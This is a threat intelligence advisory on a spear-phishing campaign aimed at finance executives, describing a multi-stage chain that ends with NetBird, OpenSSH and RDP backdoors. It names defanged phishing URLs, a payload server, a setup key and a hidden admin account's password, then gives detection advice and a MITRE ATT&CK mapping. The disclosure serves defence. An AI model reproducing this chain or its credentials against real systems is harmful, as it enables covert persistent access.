Trellix researchers uncovered a sophisticated spear-phishing campaign targeting CFOs and financial executives across multiple industries. The campaign used social engineering and a carefully crafted multi-stage attack to deploy NetBird and OpenSSH on victims’ machines, creating hidden backdoors for persistent access. The campaign, leveraging a social-engineered email from a fake Rothschild & Co recruiter, successfully evaded detection with CAPTCHA-protected phishing pages. It delivered a malicious VBS script that installed NetBird and OpenSSH, created hidden admin accounts, and enabled RDP access. This allowed attackers to establish encrypted remote access to the compromised systems.
Severity Level: Critical
Attack Flow: From Phish To Persistent Remote Access
- Initial Contact – Spear-Phishing Email:
- Subject Line: Rothschild & Co leadership opportunity (Confidential)
- Sender: Spoofed email claiming to be from a Rothschild & Co recruiter
- Objective: Entice the recipient (CFO or finance exec) to click a malicious PDF link claiming to be a job opportunity brochure.
- Phishing Link & CAPTCHA Evasion:
- Malicious Link: Redirects to Firebase-hosted phishing page
- hxxps://googl-6c11f.firebaseapp[.]com/job/file-846873865383.html
- CAPTCHA Trick: Custom CAPTCHA built using JavaScript to evade automated scanners.
- After CAPTCHA: Victim is redirected to a second Firebase domain to download a ZIP file
- hxxps://googl-6c11f.web[.]app/job/9867648797586_Scan_15052025-736574.html
- ZIP Archive & First-Stage VBS Script:
- ZIP Name: Rothschild_&Co-6745763.zip
- Contains: Rothschild&_Co-6745763.vbs (VBS dropper)
- Execution:
- Creates folder C:\temper\
- Downloads next-stage payload from: hxxp://192[.]3[.]95[.]152/cloudshare/atr/pull.pdf
- Saves it as pull.vbs and executes it using elevated privileges (runas via wscript.exe)
- Second-Stage VBS Script:
- Payload URL:
- hxxp://192[.]3[.]95[.]152/cloudshare/atr/trm
- Actions:
- Saves and renames file to trm.zip
- Extracts two MSI installers:
- NetBird.msi (VPN tool)
- OpenSSH.msi
- Installs both silently via msiexec
- Launches NetBird with setup key:
- E48E4A70-4CF4-4A77-946B-C8E50A60855A
- Payload URL:
- Establishing Persistence:
- Creates a hidden local admin account:
- Username: user
- Password: Bs@202122
- Configures system for remote access:
- Enables Remote Desktop (RDP)
- Opens Windows Firewall rules for RDP
- Sets services (netbird, sshd) to auto-start
- Creates a scheduled task to restart NetBird on system boot
- Deletes desktop shortcuts to avoid detection
- Creates a hidden local admin account:
Affected Regions:
UK, Canada, South Africa, Norway, South Korea, Singapore, Switzerland, France, Egypt, Saudi Arabia, Brazil
Affected Sectors:
Banking, Energy, Insurance, Investment firms, Mining, Semiconductor.
Recommendations:
- Treat unsolicited “opportunities” or cold-recruitment emails with skepticism, especially when they come with a ZIP or obscure download link.
- Never bypass security warnings to enable content or scripts from downloads.
- Report unusual contact attempts to security teams, even if the email seems “harmless.” Early reporting is often what prevents compromise.
- Deploy EDR to your infrastructure and triage EDR alerts related to suspicious command/script execution (via PowerShell, CMD.exe, MSHTA, WScript) and suspicious user account creation (in particular when user is added to privilege accounts).
- Vigilantly track instances of wscript.exe or powershell.exe originating from non-IT users, especially C-suite members.
- Regularly audit MSIExec activity on end-user devices to detect any unusual installations, particularly those involving script-driven behaviors.
- Implement policy rules to flag and investigate any instances of uncommon ZIP archive combinations, especially those paired with VBS files.
- Maintain visibility over new local accounts added to the Administrators group, particularly those with generic usernames like “user”.
- Block the IOCs at their respective controls.
https://www.virustotal.com/gui/collection/525dd4d309a4c2f6e2935724af1ed089c4aceb1c026ad57ea9e7f2b4a886a6d9/iocs.
MITRE ATT&CK
| Tactic | Technique | ID |
| Initial Access | Spear‑phishing Link | T1566.002 |
| Execution | User Execution – open ZIP / run VBS | T1204.002 |
| Execution | VBScript | T1059.005 |
| Command & Control | Ingress Tool Transfer | T1105 |
| Execution | PowerShell | T1059.001 |
| Defense Evasion / Execution | Signed Binary Proxy – msiexec | T1218.007 |
| Persistence | Create/Modify Windows Service | T1543.003 |
| Persistence | Remote Access Tools: Remote Desktop Software | T1219.002 |
| Persistence | Scheduled Task | T1053.005 |
| Persistence | Local Account | T1136.001 |
| Privilege Escalation | Bypass UAC (runas) | T1548.002 |
| Defense Evasion | Modify Registry | T1112 |
| Defense Evasion | Impair Defenses – Firewall | T1562.004 |
| Lateral Movement | Remote Service – RDP | T1021.001 |
| Lateral Movement / C2 | Remote Service – SSH | T1021.004 |
Source:
- https://www.trellix.com/blogs/research/cfo-spear-phishing-netbird-attack/
- https://netbird.io/knowledge-hub/netbird-response-to-spear-phishing-campaign-targeting-financial-executives
Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn
No related posts found.